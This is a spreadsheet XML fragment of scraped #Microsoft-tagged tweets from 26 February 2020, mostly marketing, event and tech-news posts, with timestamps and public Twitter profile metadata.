    <t>{'id': 1226569326561579009, 'id_str': '1226569326561579009', 'name': 'Global CleanTech Summit', 'screen_name': 'SummitCleantech', 'location': 'RAI Amsterdam', 'description': 'The Global CleanTech Summit is the largest cleantech event in the world, bringing together the latest innovations alongside todayâ€™s most influential visionaires', 'url': 'https://t.co/XhXT7ktE3q', 'entities': {'url': {'urls': [{'url': 'https://t.co/XhXT7ktE3q', 'expanded_url': 'https://globalcleantechsummit.com/', 'display_url': 'globalcleantechsummit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 40, 'friends_count': 360, 'listed_count': 0, 'created_at': 'Sun Feb 09 18:11:49 +0000 2020', 'favourites_count': 41,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'http://pbs.twimg.com/profile_images/1230609242748575757/sF1gdnoP_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230609242748575757/sF1gdnoP_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1226569326561579009/1582626456',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</si>
  <si>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09:14:51 +0000 2020</t>
  </si>
  <si>
    <t>#Ericsson and #Microsoft unite for the next generation of connected #cars https://t.co/gxkjqXMxip</t>
  </si>
  <si>
    <t>Wed Feb 26 09:14:01 +0000 2020</t>
  </si>
  <si>
    <t>for premium quality service VISIT HERE : https://t.co/ZMCvLjEqDi
#SoftwareDeveloper #azuresqldw #Microsoft #mobileapps #ITConsulting #iOSAppStore #digitalmarketer #WithYouHarPal #BTSCarpoolTONIGHT #BTSCarpoolKaraoke #DemDebate #Caruso #BTSTakeOverNYC https://t.co/cNo1wfoi8S</t>
  </si>
  <si>
    <t>Wed Feb 26 09:11:57 +0000 2020</t>
  </si>
  <si>
    <t>When the airdrop has already been looted #PLAYERUNKNOWNSBATTLEGROUNDS #twitchstreamer #twitchtv #twitchgamer #twitchgaming  #Microsoft https://t.co/JyxxpBewFI</t>
  </si>
  <si>
    <t>{'id': 1214146596226519041, 'id_str': '1214146596226519041', 'name': 'Rocky_u.k', 'screen_name': 'Rockyuk3', 'location': 'Peterborough, England', 'description': "Max 31\nTwitch streamer\nXbox one x\nAstro a40's", 'url': 'https://t.co/tIy1HKjhT5', 'entities': {'url': {'urls': [{'url': 'https://t.co/tIy1HKjhT5', 'expanded_url': 'http://www.twitch.tv/rocky_uk', 'display_url': 'twitch.tv/rocky_uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 66, 'listed_count': 0, 'created_at': 'Mon Jan 06 11:28:09 +0000 2020', 'favourites_count': 177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 177, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229099366679502854/5Tm5p_yo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229099366679502854/5Tm5p_yo_normal.jpg',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</si>
  <si>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09:11:13 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Dynamics365, GCC Group can bring your #salesforce the embedded intelligence they need to succeed -- right at their fingertips! Get case studies, tips and more on #Dynamics365 from #Microsoft and GCC Group. Subscribe now! https://t.co/JU11GXs1oR</t>
  </si>
  <si>
    <t>Wed Feb 26 09:10:00 +0000 2020</t>
  </si>
  <si>
    <t>Final speaker today with #Azure as a Service session by Yusuf Abu at the #HPE #Microsoft #Hybridcloud Summit in Riyadh !
more at https://t.co/JuaCQWEV37 
#HPEMSFT #HPEGreenlake #HPEpointnextservices @HPE_Pointnext @AljishiMaram @KouKa80 @natcom_sa @Ghand_Mo @Microsoft_Saudi https://t.co/49aHw6o9V1</t>
  </si>
  <si>
    <t>Wed Feb 26 09:09:09 +0000 2020</t>
  </si>
  <si>
    <t>Google Chrome 80 Latest Update - Biggest Changes
https://t.co/wGmnGDafER
#google #windows10 #windows #microsoft #googlechrome #software #hardware #computer #laptop #apple #gamingpc #smartphone #android #gaming  #iphone #oneplus #google #microsoft #gadgetcreators #vivekkumarvora https://t.co/BnQZKgfG2r</t>
  </si>
  <si>
    <t>Wed Feb 26 09:03:00 +0000 2020</t>
  </si>
  <si>
    <t>Keara Luehrsen explains How to become your own internal #Azure Cloud Service Provider and Pay for what you Use at #HPE #Microsoft #Hybridcloud Summit 2020 
#Riyadh #HPEMSFT #HPEGreenlake Central #Social4UTV @HPE_Pointnext #WomenInTech @Ghand_Mo @AljishiMaram https://t.co/yL0tesDQDl</t>
  </si>
  <si>
    <t>Wed Feb 26 09:01:12 +0000 2020</t>
  </si>
  <si>
    <t>#Office365 #WednesdayWisdom
Youll now be able to use #PowerApps to build custom forms for document libraries, extending metadata-enriched experiences throughout #SharePoint and #MicrosoftTeams.
#msteams #microsoft #microsoft365 #hr #humanresources</t>
  </si>
  <si>
    <t>Wed Feb 26 09:00:27 +0000 2020</t>
  </si>
  <si>
    <t>Read my Feb 26 #Microsoft Newsletter featuring Microsoft to... https://t.co/1okZnYB7oz Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Wed Feb 26 09:00:11 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/wWZFbaF8gK</t>
  </si>
  <si>
    <t>Wed Feb 26 08:58:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Windows 10X to run updates in 90 seconds or less https://t.co/1qeXz9JTLt via @computing_news #Windows10X</t>
  </si>
  <si>
    <t>Wed Feb 26 08:57:05 +0000 2020</t>
  </si>
  <si>
    <t>In this video, we see how #Microsoft can #empower #organizations to #effectively #harness the #expertise of their #people, by #connecting #employees in #real #time with #experts in the organization who can #assist them in moments o...https://t.co/WTi35G4tOV https://t.co/ZFyPoIYtZS</t>
  </si>
  <si>
    <t>Wed Feb 26 08:55:21 +0000 2020</t>
  </si>
  <si>
    <t>In this video, we see how #Microsoft's solution #empowers the fictional Contoso Hotel and Casino to provide #amazing, #personalized #experiences to #delight its consenting VIP guests, with role-tailored experiences for its #hospitality #employees. https://t.co/572cwvqWPK</t>
  </si>
  <si>
    <t>Wed Feb 26 08:54:58 +0000 2020</t>
  </si>
  <si>
    <t>Callings and Meetings workshop for #MicrosoftTeams at #Microsoft</t>
  </si>
  <si>
    <t>{'id': 6202392, 'id_str': '6202392', 'name': 'Kev Gower', 'screen_name': 'Kev_Gower', 'location': '50.843717,-1.097055', 'description': 'Head of Project and Professional Services @cobwebsolutions @vuzion Film lover, Chelsea fan and father', 'url': 'https://t.co/5pDZcJ6Qcx', 'entities': {'url': {'urls': [{'url': 'https://t.co/5pDZcJ6Qcx', 'expanded_url': 'https://uk.linkedin.com/in/kevgower', 'display_url': 'uk.linkedin.com/in/kevgower', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 198, 'friends_count': 209, 'listed_count': 69, 'created_at': 'Mon May 21 15:31:33 +0000 2007', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4032,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'http://pbs.twimg.com/profile_images/378800000137652947/ae6ea25d8a46cd101f6baf3b8abbf88d_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000137652947/ae6ea25d8a46cd101f6baf3b8abbf88d_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6202392/1476790716',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</si>
  <si>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Wed Feb 26 08:54:16 +0000 2020</t>
  </si>
  <si>
    <t>In this video, we are going to see how #Microsoft can #empower #contact #center #agents to provide #consistent, high #quality #engagements for #customers by automatically #analyzing #conversations in real-time, #powered by #machine...https://t.co/Yw7i2adDno https://t.co/0FdAHFU1kB</t>
  </si>
  <si>
    <t>Wed Feb 26 08:49:55 +0000 2020</t>
  </si>
  <si>
    <t>Next up at the #HPE #microsoft #HybridCloud Roadshow in Riyadh is @Veeam_EMEAs Nizar Elfarra presenting a new approach on protecting data in the new #digital landscape with #Veeam10
#Dataprotection #BackupForWhatsNext #HPEVeeam @AljishiMaram https://t.co/MiIg25DWLg</t>
  </si>
  <si>
    <t>Wed Feb 26 08:48:59 +0000 2020</t>
  </si>
  <si>
    <t>Designed to help you gain a deeper understanding of #Microsoft #Azure &amp;amp; allowing us to understand your IT landscape &amp;amp; needs, Azure Fundamentals allows us to recommend &amp;amp; advise you, around moving your workload services to the #cloud. Find out more https://t.co/bUHtftpwHe</t>
  </si>
  <si>
    <t>Wed Feb 26 08:48:57 +0000 2020</t>
  </si>
  <si>
    <t>Experience the possibilities of building great #businessapps without writing code at this free #technical training for IT and Business decision-makers!
Register Now   https://t.co/YPGXoDrYwN
#apps #powerplatform #appdevelopment #code #Microsoft #PowerApps #Dubai https://t.co/NXnRMp4sdt</t>
  </si>
  <si>
    <t>Wed Feb 26 08:48:32 +0000 2020</t>
  </si>
  <si>
    <t>After two years, #Microsoft still hasnt delivered on its grand vision for #LinkedIn . And it may never do so.
#communicationstrategy #communications #socialmedia https://t.co/1pdXm8Qkgq</t>
  </si>
  <si>
    <t>{'id': 190172752, 'id_str': '190172752', 'name': 'Pascal CorbÃ©', 'screen_name': 'pascal_corbe', 'location': 'Germany', 'description': "Purpose-oriented solutions for development communications, specialising in agriculture &amp; rural dev't", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 224, 'friends_count': 308, 'listed_count': 67, 'created_at': 'Mon Sep 13 07:53:21 +0000 2010', 'favourites_count': 96, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4534,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'http://pbs.twimg.com/profile_images/707257641429557248/gwZ3i9AL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/707257641429557248/gwZ3i9AL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/190172752/1433792779', 'profile_link_color': '06067D',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</si>
  <si>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Feb 26 08:43:17 +0000 2020</t>
  </si>
  <si>
    <t>Do you know that AZ-100 &amp;amp; AZ-101 certifications are now replaced by the new AZ-103 #MicrosoftAureAdministrator certification exam.
Want to know more?
Visit #K21Academys Blog Post at https://t.co/WhhwN4si3F.
#Microsoft #Azure #AzureAdministrator</t>
  </si>
  <si>
    <t>Wed Feb 26 08:40:00 +0000 2020</t>
  </si>
  <si>
    <t>.@HPE_Pointnexts Ahmed Eldosoukey in few minutes to talk about the #RightMix between Public , Private or #Hybridcloud ,  more at https://t.co/JuaCQWWvUF 
#HPE #Microsoft #HPEMSFT #HPEGreenlake #HPEpointnextservices @HPE_Pointnext @AljishiMaram @KouKa80 @natcom_sa @msdevSaudi https://t.co/6TWaA7B5Jc</t>
  </si>
  <si>
    <t>Wed Feb 26 08:35:01 +0000 2020</t>
  </si>
  <si>
    <t>The importance of starting with OneDrive  ITProMentor https://t.co/pIg1nWbLmx #MicrosoftTeams #Office365 #o365 #microsoft #microsoftlife #cloudcomputing #smb #sme #smallbusiness #ITAdmin #ITPRO #IT #onedrive 
 by @vanvfields</t>
  </si>
  <si>
    <t>{'id': 955432694204203009, 'id_str': '955432694204203009', 'name': 'FireLight IT Solutions', 'screen_name': 'FireLight_IT', 'location': 'London, England', 'description': '#ITSupport and #ITManagement for Small &amp; Medium Sized #Business (#smb) in London and Surrey. #Office365 #Backup #Security services.', 'url': 'https://t.co/xJ4J33OXdJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/xJ4J33OXdJ', 'expanded_url': 'http://www.firelightit.com', 'display_url': 'firelightit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1019, 'friends_count': 665, 'listed_count': 6, 'created_at': 'Mon Jan 22 13:31:20 +0000 2018', 'favourites_count': 83, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 483,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'http://pbs.twimg.com/profile_images/955436529740021760/K6AKkNMy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/955436529740021760/K6AKkNMy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/955432694204203009/1519122849',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</si>
  <si>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08:33:54 +0000 2020</t>
  </si>
  <si>
    <t>@shanselman #microsoft help doesnt ;) @microsoft #puns</t>
  </si>
  <si>
    <t>{'id': 17732518, 'id_str': '17732518', 'name': 'ormiga', 'screen_name': 'ormiga', 'location': 'Paris old EU', 'description': '#strategy old UNIX blog: #Oil Gas #LNG #Renewables climatechange #GreatGame++ SMALLDATA #fintech analytics SNORE #food #wine #books #art', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2033, 'friends_count': 4998, 'listed_count': 1414, 'created_at': 'Sat Nov 29 11:08:22 +0000 2008', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 166606,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'http://pbs.twimg.com/profile_images/71721747/vla_002_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/71721747/vla_002_normal.jpg',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</si>
  <si>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Wed Feb 26 08:31:18 +0000 2020</t>
  </si>
  <si>
    <t>REMOTE CODE EXECUTION ON MICROSOFT EXCHANGE SERVER THROUGH FIXED CRYPTOGRAPHIC KEYS
Exploit Tool : https://t.co/hPBnP5cN1C
#Microsoft365 #microsoft #bugbountytips</t>
  </si>
  <si>
    <t>{'id': 222727229, 'id_str': '222727229', 'name': 'SecFathy', 'screen_name': 'sirmatrixpage', 'location': '127.0.01', 'description': 'Bug Hunter &amp; Cyber Security Researcher Member @Synack RedTeam  | CTF Player', 'url': 'https://t.co/8e9VcwnBPb', 'entities': {'url': {'urls': [{'url': 'https://t.co/8e9VcwnBPb', 'expanded_url': 'http://eg.linkedin.com/in/sirmatrix', 'display_url': 'eg.linkedin.com/in/sirmatrix', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1815, 'friends_count': 1353, 'listed_count': 22, 'created_at': 'Sat Dec 04 07:47:23 +0000 2010', 'favourites_count': 1453, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 28718,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'http://pbs.twimg.com/profile_images/1110132929420840960/6digt7zj_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110132929420840960/6digt7zj_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/222727229/1568582577', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'D6942E', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Wed Feb 26 08:31:13 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/AvmUNlASWs</t>
  </si>
  <si>
    <t>Wed Feb 26 08:30:15 +0000 2020</t>
  </si>
  <si>
    <t>[NEW] - Comment installer Windows Admin Center ? - https://t.co/n77gMb5Wip #Microsoft #WAC #WindowsAdminCenter #WindowsServer</t>
  </si>
  <si>
    <t>{'id': 1655037067, 'id_str': '1655037067', 'name': 'IT-Connect.fr', 'screen_name': 'ITConnect_fr', 'location': 'France', 'description': "Des cours gratuits, des tutoriels sur les nouvelles technologies, la sÃ©curitÃ© et l'administration systÃ¨mes et rÃ©seaux ! Avec une bonne dose d'actu' par dessus !", 'url': 'http://t.co/093Vk0QVpl', 'entities': {'url': {'urls': [{'url': 'http://t.co/093Vk0QVpl', 'expanded_url': 'http://www.it-connect.fr', 'display_url': 'it-connect.fr', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4712, 'friends_count': 2219, 'listed_count': 403, 'created_at': 'Thu Aug 08 09:44:48 +0000 2013', 'favourites_count': 63, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 35520,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'http://pbs.twimg.com/profile_images/891017546975113218/wDpSOlHo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/891017546975113218/wDpSOlHo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1655037067/1501270285',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</si>
  <si>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08:30:02 +0000 2020</t>
  </si>
  <si>
    <t>A quick start guide to #Microsoft's cloud native #SIEM: Azure Sentinel #Azure #AzureSentinel https://t.co/2s1JI5BtTM #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 63107400, 'id_str': '63107400', 'name': 'Dominique Broeglin', 'screen_name': 'dbroeglin', 'location': 'France', 'description': 'French computer geek and DIY house builder - The views expressed are my own.', 'url': 'http://t.co/1h9MFBjhdW', 'entities': {'url': {'urls': [{'url': 'http://t.co/1h9MFBjhdW', 'expanded_url': 'http://dominique.broeglin.fr', 'display_url': 'dominique.broeglin.fr', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 398, 'listed_count': 40, 'created_at': 'Wed Aug 05 11:37:33 +0000 2009', 'favourites_count': 291, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2521,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'http://pbs.twimg.com/profile_images/378800000363890281/69251d4b9392eda2e06c644f35561dbd_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000363890281/69251d4b9392eda2e06c644f35561dbd_normal.jpeg',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</si>
  <si>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08:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Meet @sourabh_somani, Lead Developer, #Microsoft #MVP, Author at @CsharpCorner Annual Conference 2020. Book your seat now: https://t.co/2mXVrlEG6d #CsharpCon20 #Developers cc 
@graphitegtc @MindcrackerUS @aspose @mcbeniwal https://t.co/Frrh6L0Aj7</t>
  </si>
  <si>
    <t>Wed Feb 26 08:20:47 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft are scaring consumers over Edge extensions, and for what? - https://t.co/Bnywy87nxM #Technology</t>
  </si>
  <si>
    <t>Wed Feb 26 08:19:55 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #Azure at your service and delivered as-a-service. #HPE can make it happen. Find out how by attending the Dubai stop of the #HPE  #Microsoft #HybridCloud Summit. March 11. #HPE #Microsoft #azurestack #azurestackhci https://t.co/WNc5vQoaLv  @MicroFocus @MicrosoftUAE https://t.co/LbIFM9f0uw</t>
  </si>
  <si>
    <t>Wed Feb 26 08:17:52 +0000 2020</t>
  </si>
  <si>
    <t>Hey, remember 
#Microsoft's  #IoT
#Linux gear? 
 After two years, 
#Azure #Sphere 
is finally here 
The Register
https://t.co/hzFTJkjkb9
#bigdata
#AI #IOT #DiGiTAL #Twitter
#dataScience #dataScientist
#datagovernance #usa
#digitalTransformation
#IBM #apple
#Oracle #google</t>
  </si>
  <si>
    <t>{'id': 737142202481016832, 'id_str': '737142202481016832', 'name': 'Chidambara .ML.', 'screen_name': 'chidambara09', 'location': 'Mysore  and  BERLIN', 'description': 'Be happy  Be healthy Be smile Be cool Be good human', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6317, 'friends_count': 13, 'listed_count': 4558, 'created_at': 'Mon May 30 04:42:51 +0000 2016', 'favourites_count': 55, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 927214, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/760774125522518016/jhzjWv0i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/760774125522518016/jhzjWv0i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/737142202481016832/1538216794',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</si>
  <si>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08:15:11 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 08:11:48 +0000 2020</t>
  </si>
  <si>
    <t>When you do something right, your employees let you know. Here's what NQCranes heard from administrators, technicians, &amp;amp; managers when they migrated to a #Microsoft cloud-based #ERP system. Watch now. #Technology #IT #BusinessAutomation https://t.co/TqqDl65xed</t>
  </si>
  <si>
    <t>Wed Feb 26 08:11:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft CEO's Bengaluru visit: Who all will be at the event https://t.co/R5xTkBgvqJ
#events #microsoft #bengaluru #digital</t>
  </si>
  <si>
    <t>{'id': 706680550837194752, 'id_str': '706680550837194752', 'name': 'Squid Digital', 'screen_name': 'SquidDigi', 'location': 'Australia', 'description': 'Delivering successful digital solutions to corporations, small business &amp; start ups #Digital #Technology #Mobile #Design #Apps #Development #Web #SQUIDdigital', 'url': 'https://t.co/7Fidebh1V0', 'entities': {'url': {'urls': [{'url': 'https://t.co/7Fidebh1V0', 'expanded_url': 'http://www.squiddigital.com.au', 'display_url': 'squiddigital.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2042, 'friends_count': 1740, 'listed_count': 156, 'created_at': 'Mon Mar 07 03:19:07 +0000 2016', 'favourites_count': 413, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8543, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/813889444109389824/0jPTimED_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/813889444109389824/0jPTimED_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/706680550837194752/1492514353',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</si>
  <si>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08:10:10 +0000 2020</t>
  </si>
  <si>
    <t>Well, that was fun. Great information about HPE's Cloud Strategy &amp;amp; partnership with Microsoft in todays Keynote session of the #HPE - #Microsoft #HybridCloud Roadshow in Rjyadh presented by Ismail Ismail HPE Hybrid IT Solution Architect.  https://t.co/8Mq0BHIqw1 @HPE_HybridCloud https://t.co/pfoinozfNd</t>
  </si>
  <si>
    <t>Wed Feb 26 08:09:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft releases ISOs for #Windows10 #20H1 #RTM build to Insiders https://t.co/7JVs6xYPHs by @TheRichWoods</t>
  </si>
  <si>
    <t>Wed Feb 26 08:08:07 +0000 2020</t>
  </si>
  <si>
    <t>Access scholarships to help you teach CS  #WomenInSTEM #WomenInScience #100daysofcode #girlswhocode #technology #tech #education #Microsoft https://t.co/qOLTjHOXnV</t>
  </si>
  <si>
    <t>Wed Feb 26 08:07:52 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft recognized by #Forrester as a leader in #EnterpriseBI in latest report, "The Forrester Wave: Enterprise BI Platforms (Vendor-Managed), Q3 2019." Highest scores in strategy and market presence. Read the blog. Get in touch with Azuro #Azuro https://t.co/Trve5YUq6T</t>
  </si>
  <si>
    <t>Wed Feb 26 08:04:19 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/f1TCoVi02Y</t>
  </si>
  <si>
    <t>Wed Feb 26 08:04:08 +0000 2020</t>
  </si>
  <si>
    <t>Amazing information by Microsoft's Mohammad Soultan  
about creating applications with @Azure and #AzureStack at the #HPE #Microsoft #HybridCloud Roadshow in Rjyadh today.  Great to see. https://t.co/8Mq0BHIqw1 https://t.co/iQytwLI1wu</t>
  </si>
  <si>
    <t>Wed Feb 26 08:02:59 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft google and youtube and playback and audio bad so much and slow down and bad edge and chrome and heavy and slow response and server and service and bad feedback and heavy and lag and stopped and bad scrolling and weak performance</t>
  </si>
  <si>
    <t>Wed Feb 26 08:02:51 +0000 2020</t>
  </si>
  <si>
    <t>#KPMG combines #CyberSecurity, #data management and industry experience with #Microsofts technology to help clients improve their business protection. https://t.co/lvR93ZQpS7</t>
  </si>
  <si>
    <t>{'id': 395884575, 'id_str': '395884575', 'name': 'Olaf van Arkel', 'screen_name': 'OlafvanArkel', 'location': '', 'description': 'Werkzaam bij KPMG / Voorzitter Wij Houden Vol / Volleybal / Gym &amp; Turnen / Continu verbeteren / Lean / Management', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 489, 'friends_count': 990, 'listed_count': 23, 'created_at': 'Sat Oct 22 12:11:26 +0000 2011', 'favourites_count': 271, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2315,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'http://pbs.twimg.com/profile_images/416309351012245504/2PpGXfNE_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/416309351012245504/2PpGXfNE_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/395884575/1416771589',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</si>
  <si>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08:02:50 +0000 2020</t>
  </si>
  <si>
    <t>Education technology from #Microsoft is changing the way students learn, communicate, and collaborate. Check out how one school district is leveraging #MicrosoftEducation technology to empower their students and teachers to succeed. https://t.co/3DxZESoH8L</t>
  </si>
  <si>
    <t>{'id': 240999634, 'id_str': '240999634', 'name': 'Alden Hardouinâ˜ï¸', 'screen_name': 'HardAlden', 'location': 'Cape Town ', 'description': 'Father, Generator of New Ideas and Problem Solver - Entrepreneur', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 181, 'friends_count': 414, 'listed_count': 59, 'created_at': 'Fri Jan 21 06:17:02 +0000 2011', 'favourites_count': 364, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1446,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'http://pbs.twimg.com/profile_images/841273610136354816/63EoBjMe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/841273610136354816/63EoBjMe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/240999634/1418791948',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</si>
  <si>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08:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#CyberMDX s visibility and detection capabilities are now integrated with #Microsoft #Azure #Security Center for #IoT to receive intelligent clinical context security #analytics - #IoMT Michal Amir https://t.co/6SxKUFwuek #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Feb 26 07:59:23 +0000 2020</t>
  </si>
  <si>
    <t>WAU! Our partner @GoforeGroup is arranging an own event on 4th March where you can get in TechDays mood before the event! How amazing is that?
More information in
https://t.co/sFo7IpgxQE
#TDFinland #Preparty #Microsoft</t>
  </si>
  <si>
    <t>{'id': 874901237694693377, 'id_str': '874901237694693377', 'name': 'TechDays Finland', 'screen_name': 'Techdays_FI', 'location': 'Helsinki, Finland', 'description': 'Microsoftâ€™s premier event in Finland for all who work with Microsoft products, platforms and solutions!', 'url': 'https://t.co/TJVUzDOIHJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/TJVUzDOIHJ', 'expanded_url': 'http://www.techdaysfi.com', 'display_url': 'techdaysfi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 714, 'friends_count': 821, 'listed_count': 4, 'created_at': 'Wed Jun 14 08:08:04 +0000 2017', 'favourites_count': 964, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 681,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'http://pbs.twimg.com/profile_images/1196348040405237760/e4MwhTO__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196348040405237760/e4MwhTO__normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/874901237694693377/1572362897', 'profile_link_color': '004899',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</si>
  <si>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07:55:00 +0000 2020</t>
  </si>
  <si>
    <t>With Mark Mortimore discover the #HPE #Microsoft #AzurestackHCI solutions portfolio with Intel #Optane &amp;amp; all-NVMe flash, the broadest from the industry 
#Hybridcloud Summit Riyadh
#HPEMSFT #WS19 #social4UTV @Ghand_Mo @AljishiMaram @msdevSaudi @Othman_Albadr @Microsoft_Saudi https://t.co/U6f5lJ9SCV</t>
  </si>
  <si>
    <t>Wed Feb 26 07:52:12 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft google and youtube and playback and audio bad so much and slow down and bad edge and chrome and heavy and slow response and server and service and bad feedback</t>
  </si>
  <si>
    <t>Wed Feb 26 07:51:03 +0000 2020</t>
  </si>
  <si>
    <t>So excited to see the #HPE and #Microsoft #HybridCloud Roadshow to have arrived in the #MiddleEast with the first stop in Rjyadh Saudi Arabia today. Next up Cairo, Lisbon and Dubai. https://t.co/8Mq0BHIqw1 @AljishiMaram @HPE_HybridCloud @HPE_PointNext @Azure @msPartner https://t.co/AJt1cqpmN2</t>
  </si>
  <si>
    <t>Wed Feb 26 07:50:07 +0000 2020</t>
  </si>
  <si>
    <t>Ready2go Cloud Workshops - nice resources and information in here! 
[Landing Page] Microsoft Cloud Workshops
https://t.co/3mmwG4wfY7
#Microsoft #Azure #CloudCOmputing #OSS #Workshops https://t.co/WfSEnWzGBX</t>
  </si>
  <si>
    <t>Wed Feb 26 07:49:41 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft google and youtube and playback and audio bad so much and slow down and bad edge and chrome and heavy and slow response and server and service</t>
  </si>
  <si>
    <t>Wed Feb 26 07:47:54 +0000 2020</t>
  </si>
  <si>
    <t>"The rate of adoption and the rate of development that the Ethereum team is providing a decentralized global computer is just astounding." https://t.co/MJ3suj6l9T #Blockchain #Ethereum #Microsoft https://t.co/ZCTThrYSqd</t>
  </si>
  <si>
